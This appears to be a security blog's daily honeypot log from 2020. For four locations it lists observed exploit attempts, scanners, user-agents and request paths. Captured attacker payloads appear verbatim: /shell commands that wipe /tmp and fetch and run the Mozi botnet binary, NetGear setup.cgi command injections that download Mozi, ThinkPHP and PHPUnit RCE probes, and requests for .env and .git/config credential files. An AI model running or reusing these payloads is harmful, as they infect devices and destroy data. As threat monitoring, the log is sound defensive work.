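Konnichi Harebare to Shita Aozora

With nothing better to do, I spend the whole day facing my blog, jotting down at random the trivial thoughts that drift through my mind,

2020/11/28 Honeypot (tentative) Observation Log

This is the honeypot (tentative) observation log for 2020/11/28.

Highlights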
Location:JP

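The following were observed:
Access attempts targeting a GPON router vulnerability
Access attempts targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access attempts targeting the PHPUnit vulnerability (CVE-2017-9841)
Access attempts targeting a Spring Boot vulnerability
Access attempts targeting a ThinkPHP vulnerability
Scanning by zgrab
Scanning for Apache Solr
Scanning for Apache Tomcat
Scanning for phpMyAdmin
Scanning for WordPress plugins
Unauthorized traffic involving 112[.]124[.]42[.]80
Unauthorized traffic involving 123[.]125[.]114[.]144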

Location:US

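The following were observed:
Access attempts targeting a GPON router vulnerability
Access attempts targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access attempts targeting the PHPUnit vulnerability (CVE-2017-9841)
Access attempts targeting a vulnerability in NetGear products
Access attempts targeting a Spring Boot vulnerability
Access attempts targeting a ThinkPHP vulnerability
Scanning by zgrab
Scanning for Apache Solr
Scanning for Apache Tomcat
Scanning for phpMyAdmin
Scanning for WordPress plugins
Unauthorized traffic involving 112[.]124[.]42[.]80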

Location:UK

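The following were observed:
Access attempts targeting a GPON router vulnerability
Access attempts targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access attempts targeting the PHPUnit vulnerability (CVE-2017-9841)
Access attempts targeting a vulnerability in NetGear products
Access attempts targeting a Spring Boot vulnerability
Access attempts targeting a ThinkPHP vulnerability
Access attempts targeting a Zyxel router vulnerability
Scanning by B4ckdoor-owned-you
Scanning by zgrab
Scanning for Apache Solr
Scanning for Apache Tomcat
Scanning for phpMyAdmin
Scanning for WordPress plugins
Unauthorized traffic involving 112[.]124[.]42[.]80
Access with the User-Agent "Hello, world"
Gh0st RAT-like behavior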

The following requests to /shell were observed.

cd /tmp;
rm -rf *;
wget http[:]//125[.]26[.]241[.]203:45027/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//205[.]236[.]184[.]238:35121/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location:SG

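The following were observed:
Access attempts targeting a GPON router vulnerability
Access attempts targeting the Liferay Portal JSON Web Service vulnerability (CVE-2020-7961)
Access attempts targeting a vulnerability in Shenzhen TVT products
Access attempts targeting the PHPUnit vulnerability (CVE-2017-9841)
Access attempts targeting a Spring Boot vulnerability
Access attempts targeting a ThinkPHP vulnerability
Access attempts targeting the ZeroShell Linux Router vulnerability (CVE-2019-12725)
Scanning by ApiTool
Scanning by TBI-WebScanner
Scanning by zgrab
Scanning for Apache Solr
Scanning for Apache Tomcat
Scanning for WordPress plugins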

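Access count trend

JP: total accesses: 174 (change from previous day: +105)
US: total accesses: 270 (change from previous day: +232)
UK: total accesses: 291 (change from previous day: -34)
SG: total accesses: 47 (change from previous day: -105)

For convenience, GET / HTTP/1.1 and POST / HTTP/1.1 requests are excluded.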

Location:JP

Source IP address list


User-Agent list

Count User-Agent
4 -
3 Go-http-client/1.1
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
6 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36
119 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
18 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
4 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 zgrab/0.x
1 Mozilla/5.01682558 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/537.36(KHTML, like Gecko) Chrome/40.0.2214.89 Safari/537.36
4 PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3
8 python-requests/2.24.0

Request list

Count Method Request Protocol
1 \x16\x03\x01
1 CONNECT cn[.]bing[.]com/:443 HTTP/1.1
1 CONNECT www[.]baidu[.]com/:443 HTTP/1.1
1 CONNECT www[.]ipip[.]net/:443 HTTP/1.1
1 CONNECT www[.]voanews[.]com/:443 HTTP/1.1
9 GET /.env HTTP/1.1
1 GET /.git/config HTTP/1.1
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /PMA2011/index.php?lang=en HTTP/1.1
1 GET /PMA2012/index.php?lang=en HTTP/1.1
1 GET /PMA2013/index.php?lang=en HTTP/1.1
1 GET /PMA2014/index.php?lang=en HTTP/1.1
1 GET /PMA2015/index.php?lang=en HTTP/1.1
1 GET /PMA2016/index.php?lang=en HTTP/1.1
1 GET /PMA2017/index.php?lang=en HTTP/1.1
1 GET /PMA2018/index.php?lang=en HTTP/1.1
1 GET /PMA2019/index.php?lang=en HTTP/1.1
1 GET /PMA2020/index.php?lang=en HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/db/index.php?lang=en HTTP/1.1
1 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/pMA/index.php?lang=en HTTP/1.1
1 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
1 GET /admin/web/index.php?lang=en HTTP/1.1
1 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/admin/index.php?lang=en HTTP/1.1
1 GET /administrator/db/index.php?lang=en HTTP/1.1
1 GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /administrator/pma/index.php?lang=en HTTP/1.1
1 GET /administrator/web/index.php?lang=en HTTP/1.1
2 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/db-admin/index.php?lang=en HTTP/1.1
1 GET /db/dbadmin/index.php?lang=en HTTP/1.1
1 GET /db/dbweb/index.php?lang=en HTTP/1.1
1 GET /db/index.php?lang=en HTTP/1.1
1 GET /db/myadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /db/webadmin/index.php?lang=en HTTP/1.1
1 GET /db/webdb/index.php?lang=en HTTP/1.1
1 GET /db/websql/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
1 GET /index.php?lang=en HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /myadmin/index.php?lang=en HTTP/1.1
1 GET /mysql-admin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/db/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pMA/index.php?lang=en HTTP/1.1
1 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/web/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /php-my-admin/index.php?lang=en HTTP/1.1
1 GET /php-myadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /pma/index.php?lang=en HTTP/1.1
1 GET /pma2011/index.php?lang=en HTTP/1.1
1 GET /pma2012/index.php?lang=en HTTP/1.1
1 GET /pma2013/index.php?lang=en HTTP/1.1
1 GET /pma2014/index.php?lang=en HTTP/1.1
1 GET /pma2015/index.php?lang=en HTTP/1.1
1 GET /pma2016/index.php?lang=en HTTP/1.1
1 GET /pma2017/index.php?lang=en HTTP/1.1
1 GET /pma2018/index.php?lang=en HTTP/1.1
1 GET /pma2019/index.php?lang=en HTTP/1.1
1 GET /pma2020/index.php?lang=en HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /shopdb/index.php?lang=en HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sql/myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
1 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /sql/sql-admin/index.php?lang=en HTTP/1.1
1 GET /sql/sql/index.php?lang=en HTTP/1.1
1 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
1 GET /sql/webadmin/index.php?lang=en HTTP/1.1
1 GET /sql/webdb/index.php?lang=en HTTP/1.1
1 GET /sql/websql/index.php?lang=en HTTP/1.1
1 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /v2/_catalog HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot_.php HTTP/1.1
4 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
1 GET http[:]//boxun[.]com/ HTTP/1.1
1 GET http[:]//www[.]123cha[.]com/ HTTP/1.1
1 GET http[:]//www[.]epochtimes[.]com/ HTTP/1.1
1 GET http[:]//www[.]minghui[.]org/ HTTP/1.1
1 GET http[:]//www[.]rfa[.]org/english/ HTTP/1.1
1 GET http[:]//www[.]wujieliulan[.]com/ HTTP/1.1
1 HEAD http[:]//112[.]124[.]42[.]80:63435/ HTTP/1.1
1 HEAD http[:]//123[.]125[.]114[.]144/ HTTP/1.1
1 OPTIONS / HTTP/1.0
1 POST /HNAP1/ HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
2 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf

Location:US

Source IP address list


User-Agent list

Count User-Agent
9 -
2 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 OPR/53.0.2907.68
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
119 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
18 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
2 Mozilla/5.0 (Windows NT 6.0; rv:55.0.2) Gecko/20100101 Firefox/55.0.2
4 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2 Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
3 Mozilla/5.0 zgrab/0.x

Request list

Count Method Request Protocol
2 \x03
1 \x16\x03\x01
2 CONNECT www[.]bing[.]com/:443 HTTP/1.1
1 GET /.env HTTP/1.1
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /PMA2011/index.php?lang=en HTTP/1.1
1 GET /PMA2012/index.php?lang=en HTTP/1.1
1 GET /PMA2013/index.php?lang=en HTTP/1.1
1 GET /PMA2014/index.php?lang=en HTTP/1.1
1 GET /PMA2015/index.php?lang=en HTTP/1.1
1 GET /PMA2016/index.php?lang=en HTTP/1.1
1 GET /PMA2017/index.php?lang=en HTTP/1.1
1 GET /PMA2018/index.php?lang=en HTTP/1.1
1 GET /PMA2019/index.php?lang=en HTTP/1.1
1 GET /PMA2020/index.php?lang=en HTTP/1.1
1 GET /TP/index.php HTTP/1.1
2 GET /TP/public/index.php HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/db/index.php?lang=en HTTP/1.1
1 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/pMA/index.php?lang=en HTTP/1.1
1 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
1 GET /admin/web/index.php?lang=en HTTP/1.1
1 GET /administrator/PMA/index.php?lang=en HTTP/1.1
1 GET /administrator/admin/index.php?lang=en HTTP/1.1
1 GET /administrator/db/index.php?lang=en HTTP/1.1
1 GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /administrator/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /administrator/pma/index.php?lang=en HTTP/1.1
1 GET /administrator/web/index.php?lang=en HTTP/1.1
1 GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0
4 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/db-admin/index.php?lang=en HTTP/1.1
1 GET /db/dbadmin/index.php?lang=en HTTP/1.1
1 GET /db/dbweb/index.php?lang=en HTTP/1.1
1 GET /db/index.php?lang=en HTTP/1.1
1 GET /db/myadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /db/webadmin/index.php?lang=en HTTP/1.1
1 GET /db/webdb/index.php?lang=en HTTP/1.1
1 GET /db/websql/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
2 GET /favicon.ico HTTP/1.1
1 GET /index.php?lang=en HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /myadmin/index.php?lang=en HTTP/1.1
1 GET /mysql-admin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/db/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/pMA/index.php?lang=en HTTP/1.1
1 GET /mysql/pma/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/web/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /php-my-admin/index.php?lang=en HTTP/1.1
1 GET /php-myadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin-3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
2 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2011/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2012/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2013/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2014/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2015/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2016/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2017/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2018/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2019/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2020/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /pma/index.php?lang=en HTTP/1.1
1 GET /pma2011/index.php?lang=en HTTP/1.1
1 GET /pma2012/index.php?lang=en HTTP/1.1
1 GET /pma2013/index.php?lang=en HTTP/1.1
1 GET /pma2014/index.php?lang=en HTTP/1.1
1 GET /pma2015/index.php?lang=en HTTP/1.1
1 GET /pma2016/index.php?lang=en HTTP/1.1
1 GET /pma2017/index.php?lang=en HTTP/1.1
1 GET /pma2018/index.php?lang=en HTTP/1.1
1 GET /pma2019/index.php?lang=en HTTP/1.1
1 GET /pma2020/index.php?lang=en HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//220[.]77[.]98[.]202:51128/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
1 GET /shopdb/index.php?lang=en HTTP/1.1
2 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sql/myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/php-myadmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /sql/phpmanager/index.php?lang=en HTTP/1.1
1 GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /sql/phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /sql/sql-admin/index.php?lang=en HTTP/1.1
1 GET /sql/sql/index.php?lang=en HTTP/1.1
1 GET /sql/sqladmin/index.php?lang=en HTTP/1.1
1 GET /sql/sqlweb/index.php?lang=en HTTP/1.1
1 GET /sql/webadmin/index.php?lang=en HTTP/1.1
1 GET /sql/webdb/index.php?lang=en HTTP/1.1
1 GET /sql/websql/index.php?lang=en HTTP/1.1
1 GET /sqlmanager/index.php?lang=en HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
2 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en HTTP/1.1
2 GET /wp-content/plugins/wp-file-manager/readme.txt HTTP/1.1
2 GET http[:]//www[.]bing[.]com/ HTTP/1.1
1 HEAD http[:]//112[.]124[.]42[.]80:63435/ HTTP/1.1
1 OPTIONS / HTTP/1.0
2 POST /api/jsonws/invoke HTTP/1.1
4 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 POST http[:]//rosamoss[.]fun/1344fed055987f9eb87aef70de1922ae7239d57b2a38fd9fb91a2a3f0b4c497a798e4bac454e2423e29c9ed736680209fc9db4411b67b0dc89d46463e8b7633d79530f2c5d99b75342c0a7c55aa3fd6776436e843be01b99bd777b1f804fc0db HTTP/1.1
1 POST http[:]//rosamoss[.]fun/82396aa34d3d216d4a545cf6f34c62f84985d669d5384686caa9a5de4bc2ef3e17c4a8631f4e6dbc84f1ffe83607d5e43f9f5a0c9833ca40b09b75286001d5cd82f4cca0a7179c575ad604b916db3a8fb5981b587225ee9d1eb5307d2683bf0d HTTP/1.1
1 \xba\xabd\xa1EZC\xdbM\x87\xee^\xfd\xbf\x159 X\xd4>\x12\x98\xc4<\xe0\x13\xcf

Location:UK

Source IP address list


User-Agent list

Count User-Agent
8 -
2 B4ckdoor-owned-you
3 Hello, world
1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
202 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
46 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
18 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/71.0
1 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
4 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
4 Mozilla/5.0 zgrab/0.x

Request list

Count Method Request Protocol
1 -
1 Gh0st\xad
1 \x16\x03\x01
1 GET /.env HTTP/1.1
1 GET /2phpmyadmin/index.php?lang=en HTTP/1.1
2 GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1
2 GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1
1 GET /MyAdmin/index.php?lang=en HTTP/1.1
1 GET /PMA/index.php?lang=en HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 GET /actuator/health HTTP/1.1
1 GET /admin/db/index.php?lang=en HTTP/1.1
1 GET /admin/index.php?lang=en HTTP/1.1
1 GET /admin/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /admin/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /admin/sqladmin/index.php?lang=en HTTP/1.1
1 GET /admin/sysadmin/index.php?lang=en HTTP/1.1
4 GET /config/getuser?index=0 HTTP/1.1
2 GET /console/ HTTP/1.1
1 GET /database/index.php?lang=en HTTP/1.1
1 GET /db/index.php?lang=en HTTP/1.1
1 GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /db/phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /dbadmin/index.php?lang=en HTTP/1.1
2 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /manager/text/list HTTP/1.1
1 GET /myadmin/index.php?lang=en HTTP/1.1
1 GET /mysql-admin/index.php?lang=en HTTP/1.1
1 GET /mysql/admin/index.php?lang=en HTTP/1.1
1 GET /mysql/dbadmin/index.php?lang=en HTTP/1.1
1 GET /mysql/index.php?lang=en HTTP/1.1
1 GET /mysql/mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1
1 GET /mysqladmin/index.php?lang=en HTTP/1.1
1 GET /mysqlmanager/index.php?lang=en HTTP/1.1
1 GET /php-myadmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin1/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin2/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin3/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin4/index.php?lang=en HTTP/1.1
1 GET /phpMyAdmin5/index.php?lang=en HTTP/1.1
1 GET /phpMyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmy-admin/index.php?lang=en HTTP/1.1
1 GET /phpmy/index.php?lang=en HTTP/1.1
1 GET /phpmyAdmin/index.php?lang=en HTTP/1.1
202 GET /phpmyadmin/ HTTP/1.1
1 GET /phpmyadmin/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin1/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin2/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin3/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin4/index.php?lang=en HTTP/1.1
1 GET /phpmyadmin5/index.php?lang=en HTTP/1.1
1 GET /phppma/index.php?lang=en HTTP/1.1
1 GET /pma/index.php?lang=en HTTP/1.1
1 GET /portal/redlion HTTP/1.1
1 GET /program/index.php?lang=en HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
